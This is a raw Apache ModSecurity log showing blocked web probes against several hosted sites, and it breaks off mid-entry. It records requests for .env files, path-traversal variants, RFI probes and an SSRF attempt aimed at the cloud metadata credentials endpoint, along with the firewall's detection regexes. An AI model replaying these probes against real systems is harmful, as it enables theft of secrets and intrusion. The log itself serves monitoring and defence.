[Tue May 12 05:27:48.326232 2026] [security2:error] [pid 1825179:tid 1825208] [client 23.137.105.63:42794] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.domaine-de-janasse.com"] [uri "/.env.production"] [unique_id "agKeNNr1yOh9Tvizezie7AAAAEo"]
[Tue May 12 05:27:48.326320 2026] [security2:error] [pid 1842385:tid 1842408] [client 23.137.105.63:42806] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.domaine-de-janasse.com"] [uri "/app/.env"] [unique_id "agKeNBs7kySIUZ3ORnIlqgAAARE"]
[Tue May 12 05:27:48.326358 2026] [security2:error] [pid 1844863:tid 1844877] [client 23.137.105.63:42808] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.domaine-de-janasse.com"] [uri "/api/.env"] [unique_id "agKeNPaAnTZtx1_H_wy28AAAAUg"]
[Tue May 12 05:27:48.326359 2026] [security2:error] [pid 1820198:tid 1820213] [client 23.137.105.63:42820] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.domaine-de-janasse.com"] [uri "/backend/.env"] [unique_id "agKeNM1tk6y7yBJLpJo5UgAAAI0"]
[Tue May 12 05:27:48.326390 2026] [security2:error] [pid 1825179:tid 1825208] [client 23.137.105.63:42794] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.domaine-de-janasse.com"] [uri "/.env.production"] [unique_id "agKeNNr1yOh9Tvizezie7AAAAEo"]
[Tue May 12 05:27:48.326471 2026] [security2:error] [pid 1842385:tid 1842408] [client 23.137.105.63:42806] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.domaine-de-janasse.com"] [uri "/app/.env"] [unique_id "agKeNBs7kySIUZ3ORnIlqgAAARE"]
[Tue May 12 05:27:48.326552 2026] [security2:error] [pid 1820198:tid 1820213] [client 23.137.105.63:42820] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.domaine-de-janasse.com"] [uri "/backend/.env"] [unique_id "agKeNM1tk6y7yBJLpJo5UgAAAI0"]
[Tue May 12 05:27:48.326557 2026] [security2:error] [pid 1844863:tid 1844877] [client 23.137.105.63:42808] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.domaine-de-janasse.com"] [uri "/api/.env"] [unique_id "agKeNPaAnTZtx1_H_wy28AAAAUg"]
[Tue May 12 05:27:48.326594 2026] [security2:error] [pid 1825179:tid 1825208] [client 23.137.105.63:42794] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.domaine-de-janasse.com"] [uri "/.env.production"] [unique_id "agKeNNr1yOh9Tvizezie7AAAAEo"]
[Tue May 12 05:27:48.326669 2026] [security2:error] [pid 1842385:tid 1842408] [client 23.137.105.63:42806] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.domaine-de-janasse.com"] [uri "/app/.env"] [unique_id "agKeNBs7kySIUZ3ORnIlqgAAARE"]
[Tue May 12 05:27:48.326753 2026] [:error] [pid 1825287:tid 1825308] [client 23.137.105.63:42826] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 05:29:29.160131 2026] [security2:error] [pid 1844863:tid 1844877] [client 43.153.35.128:37966] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agKemfaAnTZtx1_H_wy3IAAAAUg"]
[Tue May 12 05:29:32.860537 2026] [security2:error] [pid 1844863:tid 1844872] [client 43.153.35.128:38190] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agKenPaAnTZtx1_H_wy3IQAAAUM"], referer: http://rentparadise.fr
[Tue May 12 05:29:39.920282 2026] [security2:error] [pid 1825179:tid 1825205] [client 18.235.81.246:4154] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://68.183.75.92 found within ARGS:url: http://68.183.75.92/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKeo9r1yOh9TvizezifYwAAAEc"]
[Tue May 12 05:29:39.920745 2026] [security2:error] [pid 1825179:tid 1825205] [client 18.235.81.246:4154] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKeo9r1yOh9TvizezifYwAAAEc"]
[Tue May 12 05:29:39.921007 2026] [security2:error] [pid 1825179:tid 1825205] [client 18.235.81.246:4154] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKeo9r1yOh9TvizezifYwAAAEc"]
PHP Warning:  filesize(): stat failed for /proc/104/task/104/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/104/task/104/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/104/task/104/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/104/task/104/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/104/task/104/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/104/task/104/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 05:29:55.674259 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.247:57240] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKeswgpmE1yW0glLdguFwAAANE"]
[Tue May 12 05:29:55.674400 2026] [security2:error] [pid 1825287:tid 1825322] [client 45.148.10.247:57240] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env"] [unique_id "agKeswgpmE1yW0glLdguFwAAANE"]
[Tue May 12 05:29:55.677645 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.247:57326] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /..%252f found within REQUEST_URI_RAW: /..%252f..%252f.ENV"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/..%2f..%2f.ENV"] [unique_id "agKesxs7kySIUZ3ORnIl6gAAAQ4"]
[Tue May 12 05:29:55.677793 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.247:57326] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /../../.ENV"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/..%2f..%2f.ENV"] [unique_id "agKesxs7kySIUZ3ORnIl6gAAAQ4"]
[Tue May 12 05:29:55.677870 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.247:57326] ModSecurity: Warning. Matched phrase "../" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "34"] [id "930110"] [rev "1"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: ../ found within REQUEST_URI: /../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "mail.castiglionecf.com"] [uri "/..%2f..%2f.ENV"] [unique_id "agKesxs7kySIUZ3ORnIl6gAAAQ4"]
[Tue May 12 05:29:55.677939 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.247:57326] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/..%2f..%2f.ENV"] [unique_id "agKesxs7kySIUZ3ORnIl6gAAAQ4"]
[Tue May 12 05:29:55.678093 2026] [security2:error] [pid 1842385:tid 1842404] [client 45.148.10.247:57326] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 20)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/..%2f..%2f.ENV"] [unique_id "agKesxs7kySIUZ3ORnIl6gAAAQ4"]
[Tue May 12 05:29:55.684985 2026] [security2:error] [pid 1808852:tid 1808866] [client 45.148.10.247:57312] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/app/.env"] [unique_id "agKesxfeipD4uoG21FowtwAAAAs"]
[Tue May 12 05:29:55.685006 2026] [security2:error] [pid 1825287:tid 1825313] [client 45.148.10.247:57254] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://169.254.169.254 found within ARGS:url: http://169.254.169.254/latest/meta-data/iam/security-credentials/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "mail.castiglionecf.com"] [uri "/_next/image"] [unique_id "agKeswgpmE1yW0glLdguGQAAAMg"]
[Tue May 12 05:29:55.702219 2026] [security2:error] [pid 1808852:tid 1808866] [client 45.148.10.247:57312] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/app/.env"] [unique_id "agKesxfeipD4uoG21FowtwAAAAs"]
[Tue May 12 05:29:55.703845 2026] [security2:error] [pid 1825287:tid 1825313] [client 45.148.10.247:57254] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/_next/image"] [unique_id "agKeswgpmE1yW0glLdguGQAAAMg"]
[Tue May 12 05:29:55.707322 2026] [security2:error] [pid 1825179:tid 1825201] [client 45.148.10.247:57244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/backend/.env"] [unique_id "agKes9r1yOh9TvizezifkgAAAEM"]
[Tue May 12 05:29:55.707491 2026] [security2:error] [pid 1825179:tid 1825201] [client 45.148.10.247:57244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/backend/.env"] [unique_id "agKes9r1yOh9TvizezifkgAAAEM"]
[Tue May 12 05:29:55.891954 2026] [security2:error] [pid 1808852:tid 1808876] [client 57.141.20.8:49882] ModSecurity: Warning. Pattern match "(?:\\xc2\\xbe|\\xc2\\xbc).*(?:\\xc2\\xbe|\\xc2\\xbc|>)|(?:\\xc2\\xbe|\\xc2\\xbc|<).*(?:\\xc2\\xbe|\\xc2\\xbc)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "136"] [id "941310"] [rev "2"] [msg "US-ASCII Malformed Encoding XSS Filter - Attack Detected."] [data "Matched Data: \\xc2\\xbe\\xc3\\x91\\xe2\\x80\\x9a\\xc3\\x91\\xe2\\x80\\xb9_\\xc3\\x90\\xc3\\xa2\\xe2\\x82\\xac\\xe2\\x84\\xa2_\\xc3\\x90\\xc5\\xa1\\xc3\\x90\\xc2\\xb0\\xc3\\x90\\xc2\\xb7\\xc3\\x90\\xc2\\xb8\\xc3\\x90\\xc2\\xbd\\xc3\\x90\\xc2\\xbe_casino_cryptoboss:_\\xc3\\x90\\xe2\\x80\\x94\\xc3\\x90\\xc2\\xb0\\xc3\\x90\\xc2\\xb1\\xc3\\x90\\xc2\\xb5\\xc3\\x91\\xe2\\x82\\xac\\xc3\\x90\\xc2\\xb8_\\xc3\\x90\\xc5\\xbe\\xc3\\x90\\xc2\\xb3\\xc3\\x91\\xe2\\x82\\xac\\xc3\\x90\\xc2\\xbe\\xc3\\x90\\xc2\\xbc\\xc3\\x90\\xc2\\xbd\\xc3\\x91\\xe2\\x80\\xb9\\xc3\\x90\\xc2\\xb9_\\xc3\\x90\\xc5\\xb8\\xc3\\x90\\xc2\\xbe\\xc3\\x90\\xc2\\xb..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-tomcat"] [tag "attack- [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKesxfeipD4uoG21FowuAAAABU"]
[Tue May 12 05:29:55.892368 2026] [security2:error] [pid 1808852:tid 1808876] [client 57.141.20.8:49882] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKesxfeipD4uoG21FowuAAAABU"]
[Tue May 12 05:29:55.892780 2026] [security2:error] [pid 1808852:tid 1808876] [client 57.141.20.8:49882] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): US-ASCII Malformed Encoding XSS Filter - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKesxfeipD4uoG21FowuAAAABU"]
[Tue May 12 05:29:56.715724 2026] [security2:error] [pid 1808852:tid 1808855] [client 45.148.10.247:57348] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env#"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "mail.castiglionecf.com"] [uri "/.env#"] [unique_id "agKetBfeipD4uoG21FowuQAAAAA"]
[Tue May 12 05:29:56.715930 2026] [security2:error] [pid 1808852:tid 1808855] [client 45.148.10.247:57348] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "mail.castiglionecf.com"] [uri "/.env#"] [unique_id "agKetBfeipD4uoG21FowuQAAAAA"]
[Tue May 12 05:29:56.849032 2026] [security2:error] [pid 1825287:tid 1825313] [client 45.148.10.247:57254] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "mail.castiglionecf.com"] [uri "/index.php"] [unique_id "agKeswgpmE1yW0glLdguGQAAAMg"]
[Tue May 12 05:29:56.855767 2026] [security2:error] [pid 1820198:tid 1820214] [client 45.148.10.247:57272] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag 